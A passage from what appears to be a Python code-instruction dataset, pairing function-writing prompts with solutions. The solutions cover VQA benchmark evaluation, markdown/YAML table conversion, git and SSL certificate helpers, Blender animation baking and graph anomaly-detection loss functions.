'train': 'data/chartqa/train_augmented.jsonl',
'test': 'data/chartqa/chartqa.jsonl',
'metric': 'relaxed_accuracy',
'max_new_tokens': 100,
},
'infovqa_test': {
'train': 'data/infographicVQA/infovqa.jsonl',
'test': 'data/infographicVQA/infovqa_test.jsonl',
'metric': 'anls',
'max_new_tokens': 100,
},
'vizwiz_val': {
'train': 'data/vizwiz/vizwiz_train.jsonl',
'test': 'data/vizwiz/vizwiz_val.jsonl',
'question': 'data/vizwiz/vizwiz_val_questions.json',
'annotation': 'data/vizwiz/vizwiz_val_annotations.json',
'metric': 'vqa_score',
'max_new_tokens': 10,
},
'deepform': {
'train': '',
'test': 'data/test_DeepForm.jsonl',
'metric': 'accuracy',
'max_new_tokens': 100,
},
'KLC': {
'train': '',
'test': 'data/test_KleisterCharity.jsonl',
'metric': 'accuracy',
'max_new_tokens': 100,
},
'WTQ': {
'train': '',
'test': 'data/test_WikiTableQuestions.jsonl',
'metric': 'accuracy',
'max_new_tokens': 100,
},
'gqa_testdev': {
'train': 'data/gqa/train.jsonl',
'test': 'data/gqa/gqa_testdev_new.json',
'metric': 'accuracy',
'max_new_tokens': 10,
},
'okvqa_val': {
'train': 'data/okvqa/okvqa_train.jsonl',
'test': 'data/okvqa/okvqa_val.jsonl',
'question': 'data/okvqa/OpenEnded_mscoco_val2014_questions.json',
'annotation': 'data/okvqa/mscoco_val2014_annotations.json',
'metric': 'vqa_score',
'max_new_tokens': 10,
},
'textvqa_val': {
'train': 'data/textvqa/textvqa_train.jsonl',
'test': 'data/textvqa/textvqa_val.jsonl',
'question': 'data/textvqa/textvqa_val_questions.json',
'annotation': 'data/textvqa/textvqa_val_annotations.json',
'metric': 'vqa_score',
'max_new_tokens': 10,
},
'stvqa_test': {
'train': 'data/STVQA/stvqa.jsonl',
'test': 'data/STVQA/stvqa.jsonl',
'metric': 'anls',
'max_new_tokens': 100,
},
'ai2diagram_test': {
'train': 'data/ai2d/train.jsonl',
'test': 'data/ai2d/test.jsonl',
'metric': 'accuracy',
'max_new_tokens': 10,
},
'vqav2_val': {
'train': 'data/vqav2/vqav2_train.jsonl',
'test': 'data/vqav2/vqav2_val.jsonl',
'question': 'data/vqav2/v2_OpenEnded_mscoco_val2014_questions.json',
'annotation': 'data/vqav2/v2_mscoco_val2014_annotations.json',
'metric': 'vqa_score',
'max_new_tokens': 10,
},
}
def evaluateANLS(ans_list):
def evaluate_relaxed_accuracy(entries):
def evaluate_exact_match_accuracy(entries):
def collate_fn(batches, tokenizer):
class VQADataset(torch.utils.data.Dataset):
def __init__(self, train, test, prompt, few_shot):
def __len__(self):
def __getitem__(self, idx):
class InferenceSampler(torch.utils.data.sampler.Sampler):
def __init__(self, size):
def _get_local_indices(total_size, world_size, rank):
def __iter__(self):
def __len__(self):
class VQA:
def __init__(self, annotation_file=None, question_file=None):
def createIndex(self):
def info(self):
def getQuesIds(self, imgIds=[], quesTypes=[], ansTypes=[]):
def getImgIds(self, quesIds=[], quesTypes=[], ansTypes=[]):
def loadQA(self, ids=[]):
def showQA(self, anns):
def loadRes(self, resFile, quesFile):
class VQAEval:
def __init__(self, vqa=None, vqaRes=None, n=2):
def evaluate(self, quesIds=None):
def processPunctuation(self, inText):
def processDigitArticle(self, inText):
def setAccuracy(self, accQA, accQuesType, accAnsType):
def setEvalQA(self, quesId, acc):
def setEvalQuesType(self, quesId, quesType, acc):
def setEvalAnsType(self, quesId, ansType, acc):
def updateProgress(self, progress):
def evaluate(model,tokenizer,prompt,args,dataset_name):
dataset_info = ds_collections[dataset_name]
dataset = VQADataset(
train=dataset_info['train'],
test=dataset_info['test'],
prompt=prompt,
few_shot=args.few_shot,
)
len_dataset = len(dataset)
if torch.distributed.get_rank() == 0:
print(f"there have {len(dataset)} in {dataset_name}")
dataloader = torch.utils.data.DataLoader(
dataset=dataset,
sampler=InferenceSampler(len_dataset),
batch_size=args.batch_size,
num_workers=args.num_workers,
pin_memory=True,
drop_last=False,
collate_fn=partial(collate_fn, tokenizer=tokenizer),
)
outputs = []
for image_paths,question_ids, input_ids, attention_mask,annotations in tqdm(dataloader):
pred = model.generate(
input_ids=input_ids.cuda(),
attention_mask=attention_mask.cuda(),
do_sample=False,
num_beams=1,
max_new_tokens=dataset_info['max_new_tokens'],
min_new_tokens=1,
length_penalty=1,
num_return_sequences=1,
output_hidden_states=True,
use_cache=True,
pad_token_id=tokenizer.eod_id,
eos_token_id=tokenizer.eod_id,
)
answers = [
tokenizer.decode(_[input_ids.size(1):].cpu(),
skip_special_tokens=True).strip() for _ in pred
]
for image_path,question_id, answer, annotation in zip(image_paths,question_ids, answers,
annotations):
if dataset_name in ['vqav2_val', 'okvqa_val', 'textvqa_val', 'vizwiz_val']:
outputs.append({
'image_path':image_path,
'question_id': question_id,
'answer': answer,
})
elif dataset_name in ['docvqa_test', 'gqa_testdev',"stvqa_test","infovqa_test"]:
outputs.append({
'image_path':image_path,
'questionId': question_id,
'answer': answer,
'annotation': annotation,
})
elif dataset_name in ['ai2diagram_test',"WTQ","deepform","KLC"]:
outputs.append({
'image_path':image_path,
'image': question_id,
'answer': answer,
'annotation': annotation,
})
elif dataset_name in ['estvqa_test']:
outputs.append({
'image_path':image_path,
'questionId': question_id,
'answer': answer,
'annotation': [annotation],
})
elif dataset_name in ["chartqa"]:
outputs.append({
'image_path':image_path,
'answer': answer,
'annotation': annotation,
})
else:
raise NotImplementedError
torch.distributed.barrier()
world_size = torch.distributed.get_world_size()
merged_outputs = [None for _ in range(world_size)]
torch.distributed.all_gather_object(merged_outputs, json.dumps(outputs))
merged_outputs = [json.loads(_) for _ in merged_outputs]
merged_outputs = [_ for _ in itertools.chain.from_iterable(merged_outputs)]
if torch.distributed.get_rank() == 0:
print(f"Evaluating {dataset_name} ...")
results_file = f'{dataset_name}.json'
root_path = os.path.join("result",args.save_name)
Path(root_path).mkdir(exist_ok=True,parents=True)
results_file = os.path.join(root_path,results_file)
json.dump(merged_outputs, open(results_file, 'w',encoding="utf-8"), ensure_ascii=False,indent=2)
if dataset_info['metric'] == 'vqa_score':
vqa = VQA(dataset_info['annotation'],dataset_info['question'])
results = vqa.loadRes(
resFile=results_file,
quesFile=dataset_info['question'])
vqa_scorer = VQAEval(vqa, results, n=2)
question_id_list = [item["question_id"]for item in merged_outputs]
vqa_scorer.evaluate(question_id_list)
print(vqa_scorer.accuracy)
results_file = results_file.replace("json","txt")
with open(results_file,"w") as fp:
fp.write(dataset_name+"\n")
fp.writelines(str(vqa_scorer.accuracy["overall"])+'\n')
elif dataset_info['metric'] == 'anls':
json.dump(merged_outputs,
open(results_file, 'w'),
ensure_ascii=False)
anls_res = evaluateANLS(merged_outputs)
print(anls_res)
results_file = results_file.replace("json","txt")
with open(results_file,"w") as fp:
fp.write(dataset_name+"\n")
fp.writelines(str(anls_res)+'\n')
elif dataset_info['metric'] == 'relaxed_accuracy':
print({
'relaxed_accuracy': evaluate_relaxed_accuracy(merged_outputs)
})
results_file = results_file.replace("json","txt")
with open(results_file,"w") as fp:
fp.write(dataset_name+"\n")
fp.writelines(str(evaluate_relaxed_accuracy(merged_outputs))+'\n')
elif dataset_info['metric'] == 'accuracy':
if 'gqa' in dataset_name:
for entry in merged_outputs:
response = entry['answer']
response = response.strip().split('.')[0].split(
',')[0].split('!')[0].lower()
if 'is ' in response:
response = response.split('is ')[1]
if 'are ' in response:
response = response.split('are ')[1]
if 'a ' in response:
response = response.split('a ')[1]
if 'an ' in response:
response = response.split('an ')[1]
if 'the ' in response:
response = response.split('the ')[1]
if ' of' in response:
response = response.split(' of')[0]
response = response.strip()
entry['answer'] = response
acc = evaluate_exact_match_accuracy(merged_outputs)
print({'accuracy': acc})
results_file = results_file.replace("json","txt")
with open(results_file,"w") as fp:
fp.write(dataset_name+"\n")
fp.writelines(str(acc)+'\n')
torch.distributed.barrier() | null |
3,776 | import re
import requests
import time
from datetime import datetime
print(datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
headers = {"Authorization": "INPUT YOUR KEY"}
print(datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
def get_latest_version_number(owner, repo):
url = f"https://api.github.com/repos/{owner}/{repo}/tags"
response = requests.get(url, headers=headers)
response.raise_for_status()
tags = response.json()
if tags:
print(f"Got latest version number for {owner}/{repo}: {tags[0]['name']}")
return tags[0]["name"]
else:
return None | null |
3,777 | import subprocess
import yaml
import os
import re
The provided code snippet includes necessary dependencies for implementing the `read_mdfile` function. Write a Python function `def read_mdfile(md_file: str)` to solve the following problem:
Read markdown file
Here is the function:
def read_mdfile(md_file: str):
"""Read markdown file"""
with open(md_file, "r", encoding="utf-8") as f:
md_str = f.read()
return md_str | Read markdown file |
3,778 | import subprocess
import yaml
import os
import re
The provided code snippet includes necessary dependencies for implementing the `write_mdfile` function. Write a Python function `def write_mdfile(md_file: str, md_str: str)` to solve the following problem:
Write markdown file
Here is the function:
def write_mdfile(md_file: str, md_str: str):
"""Write markdown file"""
with open(md_file, "w", encoding="utf-8") as f:
f.write(md_str) | Write markdown file |
3,779 | import subprocess
import yaml
import os
import re
The provided code snippet includes necessary dependencies for implementing the `read_yaml` function. Write a Python function `def read_yaml(yaml_file)` to solve the following problem:
Read yaml file
Here is the function:
def read_yaml(yaml_file):
"""Read yaml file"""
with open(yaml_file, "r", encoding="utf-8") as f:
data = yaml.load(f, Loader=yaml.FullLoader)
return data | Read yaml file |
3,780 | import subprocess
import yaml
import os
import re
The provided code snippet includes necessary dependencies for implementing the `write_yaml` function. Write a Python function `def write_yaml(yaml_file, data)` to solve the following problem:
Write yaml file
Here is the function:
def write_yaml(yaml_file, data):
"""Write yaml file"""
with open(yaml_file, "w", encoding="utf-8") as f:
yaml.dump(data, f, allow_unicode=True, sort_keys=False) | Write yaml file |
3,781 | import subprocess
import yaml
import os
import re
The provided code snippet includes necessary dependencies for implementing the `replace_content` function. Write a Python function `def replace_content(src: str, content: str, start_comment: str, end_comment: str)` to solve the following problem:
Replace content between start and end comment
Here is the function:
def replace_content(src: str, content: str, start_comment: str, end_comment: str):
"""Replace content between start and end comment"""
pattern = f"{start_comment}[\\s\\S]+{end_comment}"
repl = f"{start_comment}\n\n{content}\n\n{end_comment}"
if re.search(pattern, src) is None:
print(
f"can not find comment in src, please check it, it should be {start_comment} and {end_comment}"
)
return re.sub(pattern, repl, src) | Replace content between start and end comment |
3,782 | import subprocess
import yaml
import os
import re
def get_substr_before(src: str, split_str: str):
"""Get substring before split_str"""
idx = src.find(split_str)
if idx == -1:
return src
return src[:idx]
def get_substr_after(src: str, split_str: str):
"""Get substring after split_str"""
idx = src.find(split_str)
if idx == -1:
return src
return src[idx + len(split_str) :]
def parse_header(header_str: str):
"""Parse header string to yaml key"""
# to lower case || TL;DR -> tldr || " " -> "_"
return header_str.strip().lower().replace(" ", "_").replace(";", "")
The provided code snippet includes necessary dependencies for implementing the `mdtable_to_yaml` function. Write a Python function `def mdtable_to_yaml(table_content: str, md_ref: dict)` to solve the following problem:
Convert markdown table to yaml
Here is the function:
def mdtable_to_yaml(table_content: str, md_ref: dict):
"""Convert markdown table to yaml"""
# parse table to list
table_list = []
for line in table_content.splitlines():
if line.startswith("|"): # skip empty line
table_list.append(line.strip("|").strip().split("|"))
# check table exist
if len(table_list) == 0:
return {}, md_ref
# get table header and body
table_header = table_list[0] # header
table_line = table_list[1] # line length
table_body = table_list[2:] # body
header_alias = {}
for i, header in enumerate(table_header):
# parse header to yaml key
header_alias[i] = parse_header(header)
# parse table body to dict
data = {}
data["header"] = {}
for i, header in enumerate(table_header):
# save header
data["header"][header_alias[i]] = header
data["length"] = {}
for i, line in enumerate(table_line):
# count and save line length
data["length"][header_alias[i]] = len(line.strip())
data["body"] = []
for line in table_body:
line_dict = {}
for i, item in enumerate(line):
if header_alias[i] == "tldr" and len(item.strip()) > 0:
# special handle for tldr
# abbr[^abbr] -> abbr || " " -> "-" || "+" -> "plus"
abbr = (
item.strip()
.split("[")[0]
.strip()
.replace(" ", "-")
.replace("+", "plus")
)
if not abbr in md_ref:
# can not find abbr in md_ref
print(f"can not find {abbr} in md_ref")
# default value
md_ref[abbr] = "TBC"
# save content
line_dict[header_alias[i]] = f"{abbr}: {md_ref[abbr]}"
continue
if header_alias[i] == "materials":
# special handle for materials
# get links in materials
get_links = re.findall(r"\[.*?\]\(.*?\)", item.strip())
links = {}
for link in get_links:
# parse link to dict, split by "]("
# [[link]](url) || [[link](url)] || [link](url) -> {link: url}
text = get_substr_before(link, "](").strip("[]").strip()
url = get_substr_after(link, "](").strip(")").strip()
# to upper case
links[text.upper()] = url
line_dict[header_alias[i]] = links
continue
# other cases
line_dict[header_alias[i]] = item.strip()
data["body"].append(line_dict)
return data, md_ref | Convert markdown table to yaml |
3,783 | import subprocess
import yaml
import os
import re
def get_substr_before(src: str, split_str: str):
"""Get substring before split_str"""
idx = src.find(split_str)
if idx == -1:
return src
return src[:idx]
def get_substr_after(src: str, split_str: str):
"""Get substring after split_str"""
idx = src.find(split_str)
if idx == -1:
return src
return src[idx + len(split_str) :]
The provided code snippet includes necessary dependencies for implementing the `yaml_to_mdtable` function. Write a Python function `def yaml_to_mdtable(yaml_data: dict, md_ref: str)` to solve the following problem:
Convert yaml to markdown table
Here is the function:
def yaml_to_mdtable(yaml_data: dict, md_ref: str):
"""Convert yaml to markdown table"""
# check yaml data exist
if len(yaml_data) == 0:
return "", md_ref
# get table header and body
table_header = yaml_data["header"] # header
table_line = yaml_data["length"] # line length
table_body = yaml_data["body"] # body
# parse table body to dict
table_list = []
# header
table_list.append("|" + "|".join(table_header.values()) + "|")
# line length
table_list.append(
"| " + " | ".join(["-" * line for line in table_line.values()]) + " |"
)
for line in table_body:
# remove tldr
if "tldr" in line:
line.pop("tldr")
for key in table_header.keys():
if key == "tldr":
continue
# special handle for tldr
# split by first ":"
abbr = get_substr_before(line[key], ":").strip()
if len(abbr) > 0:
# save abbr to md_ref
md_ref += f"[^{abbr}]: {get_substr_after(line[key], ':').strip()}\n"
# revert "plus" to "+"
line[key] = f"{abbr.replace('plus', '+')}[^{abbr}]"
else:
# empty abbr
line[key] = ""
if key == "materials":
# special handle for materials
links = []
if type(line[key]) is not dict:
# wrong type
print(f"materials is str, please check it: {line[key]}")
else:
# parse dict to str
for text, url in line[key].items():
links.append(f"[[{text}]({url})]")
line[key] = " ".join(links)
# other cases
table_list.append("| " + " | ".join(line.values()) + " |")
return "\n".join(table_list), md_ref | Convert yaml to markdown table |
3,784 | import subprocess
import yaml
import os
import re
def get_substr_before(src: str, split_str: str):
"""Get substring before split_str"""
idx = src.find(split_str)
if idx == -1:
return src
return src[:idx]
def get_substr_after(src: str, split_str: str):
"""Get substring after split_str"""
idx = src.find(split_str)
if idx == -1:
return src
return src[idx + len(split_str) :]
def get_content(src: str, start_comment: str, end_comment: str):
"""Get content between start and end comment"""
pattern = f"{start_comment}[\\s\\S]+{end_comment}"
if re.search(pattern, src) is None:
print(
f"can not find comment in src, please check it, it should be {start_comment} and {end_comment}"
)
return re.search(pattern, src).group(0)
The provided code snippet includes necessary dependencies for implementing the `get_mdref` function. Write a Python function `def get_mdref(md_str: str, start_comment: str, end_comment: str)` to solve the following problem:
Get md ref from md_str
Here is the function:
def get_mdref(md_str: str, start_comment: str, end_comment: str):
"""Get md ref from md_str"""
ref_content = get_content(md_str, start_comment, end_comment)
ref_dict = {}
for line in ref_content.splitlines():
# skip empty line
if line.startswith("["):
# get abbr and content
# [^abbr]: content -> {abbr: content}
# abbr: " " -> "-" || "+" -> "plus" || "^" -> "" || "[]" -> ""
# split by first "]:"
abbr = (
get_substr_before(line, "]:")
.strip("[]")
.replace("^", "")
.strip()
.replace(" ", "-")
.replace("+", "plus")
)
# split by first "]:"
cont = get_substr_after(line, "]:").strip()
if len(cont) == 0:
# empty content
print(f"can not find content for {abbr}")
# default value
cont = "TBC"
ref_dict[abbr] = cont
return ref_dict | Get md ref from md_str |
3,785 | import subprocess
import yaml
import os
import re
The provided code snippet includes necessary dependencies for implementing the `write_mdref` function. Write a Python function `def write_mdref(md_ref: dict)` to solve the following problem:
Write md ref to README.md
Here is the function:
def write_mdref(md_ref: dict):
"""Write md ref to README.md"""
ref_list = []
for key, value in md_ref.items():
# parse [^abbr]: content
ref_list.append(f"[^{key}]: {value}")
return "\n".join(ref_list) | Write md ref to README.md |
3,786 | import subprocess
import yaml
import os
import re
The provided code snippet includes necessary dependencies for implementing the `get_git_log_time` function. Write a Python function `def get_git_log_time(file_path: str)` to solve the following problem:
Get git log time
Here is the function:
def get_git_log_time(file_path: str):
"""Get git log time"""
cmd = f"git log -1 --format=%cd --date=iso {file_path}"
resp = subprocess.check_output(cmd, shell=True)
return resp.decode("utf-8").strip() | Get git log time |
3,787 | import pandas as pd
import os
import re
import datetime
import time
import pytz
import requests
import ssl
import urllib.parse
import OpenSSL
from dateutil import parser
def get_host_info(url):
parsed_url = urllib.parse.urlparse(url)
host = parsed_url.netloc
return host | null |
3,788 | import pandas as pd
import os
import re
import datetime
import time
import pytz
import requests
import ssl
import urllib.parse
import OpenSSL
from dateutil import parser
def get_certificate_expiration_date(host):
result = ''
hostname = host
port = 443
cert = ssl.get_server_certificate((hostname, port)).encode()
if(cert):
cert_obj = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, cert)
cert_expire_time = parser.parse(cert_obj.get_notAfter().decode("UTF-8")).strftime('%Y-%m-%d %H:%M:%S')
if(cert_obj.has_expired()):
result = ''
else:
current_date = datetime.datetime.now()
remaining_days = (datetime.datetime.strptime(cert_expire_time, "%Y-%m-%d %H:%M:%S") - current_date).days
yymmdd_expiration_date = str(cert_expire_time)[0:10]
result = str(yymmdd_expiration_date)+"(剩"+str(remaining_days)+ "天到期)"
else:
result = ''
return result | null |
3,789 | import pandas as pd
import os
import re
import datetime
import time
import pytz
import requests
import ssl
import urllib.parse
import OpenSSL
from dateutil import parser
def get_all_tag(website_info_data):
all_tag = []
all_tag_info_data = []
# 遍历数据,获取所有的tag
for website_info_index, website_info_row in website_info_data.iterrows():
tag_list = website_info_row["Tag"].split(";")
pure_tag_list = []
for tag in tag_list:
pure_tag = tag.strip()
if pure_tag != "":
pure_tag_list.append(pure_tag)
if pure_tag not in all_tag:
all_tag.append(pure_tag)
all_tag_info_data.append([])
print("pure_tag_list", pure_tag_list)
print(
"tag==>>",
website_info_index,
website_info_row["Tag"],
"pure_tag_list==>>",
pure_tag_list,
)
# 遍历所有数据,将数据放到all_tag_info_data 中
for website_info_index, website_info_row in website_info_data.iterrows():
tag_list = website_info_row["Tag"].split(";")
for tag in tag_list:
pure_tag = tag.strip()
if pure_tag != "":
all_tag_info_data[all_tag.index(pure_tag)].append(website_info_row)
print("all_tag", all_tag, "all_tag_info_data", all_tag_info_data)
return {"all_tag": all_tag, "all_tag_info_data": all_tag_info_data} | null |
3,790 | import pandas as pd
import os
import re
import datetime
import time
import pytz
import requests
import ssl
import urllib.parse
import OpenSSL
from dateutil import parser
def short_url(url):
result = ""
if(url.startswith("http://")):
url = url[7:]
if(url.startswith("https://")):
url = url[8:]
if(url.startswith("www.")):
url = url[4:]
if(url.endswith("/")):
url = url[:-1]
if len(url) > 30:
result = url[0:30] + "..."
else:
result = url
return result | null |
3,791 | import pandas as pd
import os
import re
import datetime
import time
import pytz
import requests
import ssl
import urllib.parse
import OpenSSL
from dateutil import parser
def replaceTemplate(template, reInfo, data):
reResult = re.findall(reInfo, template)
new_read_me = template.replace(reResult[0], data)
return new_read_me | null |
3,792 | import pandas as pd
import os
import re
import datetime
import time
import pytz
import requests
import ssl
import urllib.parse
import OpenSSL
from dateutil import parser
def create_tag_table_html(tag_name, tag_info_data):
print("==create_tag_table_html", tag_name)
website_info_html = "<a href='#目录'>🔙目录</a>" + "\n" + "<table>"
website_info_html = (
website_info_html
+ "<tr>"
+ "<td width='400'>"
+ "<span>(づ。◕‿‿◕。)づ</span><br/><span>Name</span>"
+ "</td>"
+ "<td>"
+ "<span> (●゚ω゚●)</span><br/><span>Description</span>"
+ "</td>"
+ "</tr>"
)
for info_data in tag_info_data:
print(
"==>>",
{
"Name": info_data["Name"],
"Url": info_data["Url"],
"Description": info_data["Description"],
},
)
website_info_html = (
website_info_html
+ "<tr>"
+ "<td>"
+ info_data["Name"]
+ "</td>"
+ "<td>"
+ info_data["Description"]
+ "</td>"
+ "</tr>"
)
website_info_html = website_info_html + "</table>" + "\n" + "<a href='#目录'>🔙目录</a>" + "\n"
return website_info_html | null |
3,793 | import bpy
from bpy.types import Action, Context
def action_frame_range(act: Action):
r = [9999999999, -9999999999]
for curve in act.fcurves:
cr = curve.range()
r[0] = min(r[0], cr[0])
r[1] = max(r[1], cr[1])
return r
def action_to_python_data_text(act: Action, text_block_name):
channels = {}
act_range = action_frame_range(act)
for curve in act.fcurves:
baked_keys = []
for frame in range(int(act_range[0]), int(act_range[1]) + 1):
baked_keys += [(frame, curve.evaluate(frame))]
channels[(curve.data_path, curve.array_index)] = baked_keys
text = "{\n"
for k in channels:
text += " {}: [".format(k)
for point in channels[k]:
text += "({}, {:.6f}), ".format(point[0], point[1])
text += "],\n"
text += "}\n"
return bpy.data.texts.new(text_block_name).from_string(text) | null |
3,794 | import bpy
from bpy.types import Action, Context
def python_data_to_loop_action(data, action_name, rot_factor=1.0, loc_factor=1.0) -> Action:
act = bpy.data.actions.new(action_name)
for k in data:
curve = act.fcurves.new(k[0], index=k[1])
curve.keyframe_points.add(len(data[k]))
for i in range(len(data[k])):
co = [data[k][i][0], data[k][i][1]]
if k[0].startswith("rotation"):
co[1] *= rot_factor
if k[0].startswith("location"):
co[1] *= loc_factor
curve.keyframe_points[i].co = co
curve.keyframe_points[i].handle_left_type = 'AUTO'
curve.keyframe_points[i].handle_right_type = 'AUTO'
curve.keyframe_points[-1].co[1] = curve.keyframe_points[0].co[1] # Ensure looping.
curve.modifiers.new('CYCLES')
curve.update()
act.use_fake_user = False
act.user_clear()
return act | null |
3,795 | from setuptools import find_packages, setup
from os import path
with open(ver_file) as f:
exec(f.read())
this_directory = path.abspath(path.dirname(__file__))
with open(path.join(this_directory, 'requirements.txt'),
encoding='utf-8') as f:
requirements = f.read().splitlines()
def readme():
with open(path.join(this_directory, 'README.rst'), encoding='utf-8') as f:
return f.read() | null |
3,796 | import torch
import torch.nn.functional as F
from scipy.linalg import sqrtm
import math
The provided code snippet includes necessary dependencies for implementing the `double_recon_loss` function. Write a Python function `def double_recon_loss(x, x_, s, s_, weight=0.5, pos_weight_a=0.5, pos_weight_s=0.5, bce_s=False)` to solve the following problem:
r""" Double reconstruction loss function for feature and structure. The loss function is defined as :math:`\alpha \symbf{E_a} + (1-\alpha) \symbf{E_s}`, where :math:`\alpha` is the weight between 0 and 1 inclusive, and :math:`\symbf{E_a}` and :math:`\symbf{E_s}` are the reconstruction loss for feature and structure, respectively. The first dimension is kept for outlier scores of each node. For feature reconstruction, we use mean squared error loss: :math:`\symbf{E_a} = \|\symbf{X}-\symbf{X}'\|\odot H`, where :math:`H=\begin{cases}1 - \eta & \text{if }x_{ij}=0\\ \eta & \text{if }x_{ij}>0\end{cases}`, and :math:`\eta` is the positive weight for feature. For structure reconstruction, we use mean squared error loss by default: :math:`\symbf{E_s} = \|\symbf{S}-\symbf{S}'\|\odot \Theta`, where :math:`\Theta=\begin{cases}1 - \theta & \text{if }s_{ij}=0\\ \theta & \text{if }s_{ij}>0 \end{cases}`, and :math:`\theta` is the positive weight for structure. Alternatively, we can use binary cross entropy loss for structure reconstruction: :math:`\symbf{E_s} = \text{BCE}(\symbf{S}, \symbf{S}' \odot \Theta)`. Parameters ---------- x : torch.Tensor Ground truth node feature x_ : torch.Tensor Reconstructed node feature s : torch.Tensor Ground truth node structure s_ : torch.Tensor Reconstructed node structure weight : float, optional Balancing weight :math:`\alpha` between 0 and 1 inclusive between node feature and graph structure. Default: ``0.5``. pos_weight_a : float, optional Positive weight for feature :math:`\eta`. Default: ``0.5``. pos_weight_s : float, optional Positive weight for structure :math:`\theta`. Default: ``0.5``. bce_s : bool, optional Use binary cross entropy for structure reconstruction loss. Returns ------- score : torch.tensor Outlier scores of shape :math:`N` with gradients.
Here is the function:
def double_recon_loss(x,
x_,
s,
s_,
weight=0.5,
pos_weight_a=0.5,
pos_weight_s=0.5,
bce_s=False):
r"""
Double reconstruction loss function for feature and structure.
The loss function is defined as :math:`\alpha \symbf{E_a} +
(1-\alpha) \symbf{E_s}`, where :math:`\alpha` is the weight between
0 and 1 inclusive, and :math:`\symbf{E_a}` and :math:`\symbf{E_s}`
are the reconstruction loss for feature and structure, respectively.
The first dimension is kept for outlier scores of each node.
For feature reconstruction, we use mean squared error loss:
:math:`\symbf{E_a} = \|\symbf{X}-\symbf{X}'\|\odot H`,
where :math:`H=\begin{cases}1 - \eta &
\text{if }x_{ij}=0\\ \eta & \text{if }x_{ij}>0\end{cases}`, and
:math:`\eta` is the positive weight for feature.
For structure reconstruction, we use mean squared error loss by
default: :math:`\symbf{E_s} = \|\symbf{S}-\symbf{S}'\|\odot
\Theta`, where :math:`\Theta=\begin{cases}1 -
\theta & \text{if }s_{ij}=0\\ \theta & \text{if }s_{ij}>0
\end{cases}`, and :math:`\theta` is the positive weight for
structure. Alternatively, we can use binary cross entropy loss
for structure reconstruction: :math:`\symbf{E_s} =
\text{BCE}(\symbf{S}, \symbf{S}' \odot \Theta)`.
Parameters
----------
x : torch.Tensor
Ground truth node feature
x_ : torch.Tensor
Reconstructed node feature
s : torch.Tensor
Ground truth node structure
s_ : torch.Tensor
Reconstructed node structure
weight : float, optional
Balancing weight :math:`\alpha` between 0 and 1 inclusive between node feature
and graph structure. Default: ``0.5``.
pos_weight_a : float, optional
Positive weight for feature :math:`\eta`. Default: ``0.5``.
pos_weight_s : float, optional
Positive weight for structure :math:`\theta`. Default: ``0.5``.
bce_s : bool, optional
Use binary cross entropy for structure reconstruction loss.
Returns
-------
score : torch.tensor
Outlier scores of shape :math:`N` with gradients.
"""
assert 0 <= weight <= 1, "weight must be a float between 0 and 1."
assert 0 <= pos_weight_a <= 1 and 0 <= pos_weight_s <= 1, \
"positive weight must be a float between 0 and 1."
# attribute reconstruction loss
diff_attr = torch.pow(x - x_, 2)
if pos_weight_a != 0.5:
diff_attr = torch.where(x > 0,
diff_attr * pos_weight_a,
diff_attr * (1 - pos_weight_a))
attr_error = torch.sqrt(torch.sum(diff_attr, 1))
# structure reconstruction loss
if bce_s:
diff_stru = F.binary_cross_entropy(s_, s, reduction='none')
else:
diff_stru = torch.pow(s - s_, 2)
if pos_weight_s != 0.5:
diff_stru = torch.where(s > 0,
diff_stru * pos_weight_s,
diff_stru * (1 - pos_weight_s))
stru_error = torch.sqrt(torch.sum(diff_stru, 1))
score = weight * attr_error + (1 - weight) * stru_error
return score | r""" Double reconstruction loss function for feature and structure. The loss function is defined as :math:`\alpha \symbf{E_a} + (1-\alpha) \symbf{E_s}`, where :math:`\alpha` is the weight between 0 and 1 inclusive, and :math:`\symbf{E_a}` and :math:`\symbf{E_s}` are the reconstruction loss for feature and structure, respectively. The first dimension is kept for outlier scores of each node. For feature reconstruction, we use mean squared error loss: :math:`\symbf{E_a} = \|\symbf{X}-\symbf{X}'\|\odot H`, where :math:`H=\begin{cases}1 - \eta & \text{if }x_{ij}=0\\ \eta & \text{if }x_{ij}>0\end{cases}`, and :math:`\eta` is the positive weight for feature. For structure reconstruction, we use mean squared error loss by default: :math:`\symbf{E_s} = \|\symbf{S}-\symbf{S}'\|\odot \Theta`, where :math:`\Theta=\begin{cases}1 - \theta & \text{if }s_{ij}=0\\ \theta & \text{if }s_{ij}>0 \end{cases}`, and :math:`\theta` is the positive weight for structure. Alternatively, we can use binary cross entropy loss for structure reconstruction: :math:`\symbf{E_s} = \text{BCE}(\symbf{S}, \symbf{S}' \odot \Theta)`. Parameters ---------- x : torch.Tensor Ground truth node feature x_ : torch.Tensor Reconstructed node feature s : torch.Tensor Ground truth node structure s_ : torch.Tensor Reconstructed node structure weight : float, optional Balancing weight :math:`\alpha` between 0 and 1 inclusive between node feature and graph structure. Default: ``0.5``. pos_weight_a : float, optional Positive weight for feature :math:`\eta`. Default: ``0.5``. pos_weight_s : float, optional Positive weight for structure :math:`\theta`. Default: ``0.5``. bce_s : bool, optional Use binary cross entropy for structure reconstruction loss. Returns ------- score : torch.tensor Outlier scores of shape :math:`N` with gradients. |
3,797 | import torch
import torch.nn.functional as F
from scipy.linalg import sqrtm
import math
The provided code snippet includes necessary dependencies for implementing the `KL_neighbor_loss` function. Write a Python function `def KL_neighbor_loss(predictions, targets, mask_len, device)` to solve the following problem:
The local neighor distribution KL divergence loss used in GAD-NR. Source: https://github.com/Graph-COM/GAD-NR/blob/master/GAD-NR_inj_cora.ipynb
Here is the function:
def KL_neighbor_loss(predictions, targets, mask_len, device):
"""
The local neighor distribution KL divergence loss used in GAD-NR.
Source:
https://github.com/Graph-COM/GAD-NR/blob/master/GAD-NR_inj_cora.ipynb
"""
x1 = predictions.squeeze().cpu().detach()[:mask_len, :]
x2 = targets.squeeze().cpu().detach()[:mask_len, :]
mean_x1 = x1.mean(0)
mean_x2 = x2.mean(0)
nn = x1.shape[0]
h_dim = x1.shape[1]
cov_x1 = (x1-mean_x1).transpose(1,0).matmul(x1-mean_x1) / max((nn-1),1)
cov_x2 = (x2-mean_x2).transpose(1,0).matmul(x2-mean_x2) / max((nn-1),1)
eye = torch.eye(h_dim)
cov_x1 = cov_x1 + eye
cov_x2 = cov_x2 + eye
KL_loss = 0.5 * (math.log(torch.det(cov_x1) / torch.det(cov_x2)) - h_dim
+ torch.trace(torch.inverse(cov_x2).matmul(cov_x1)) + (mean_x2 -
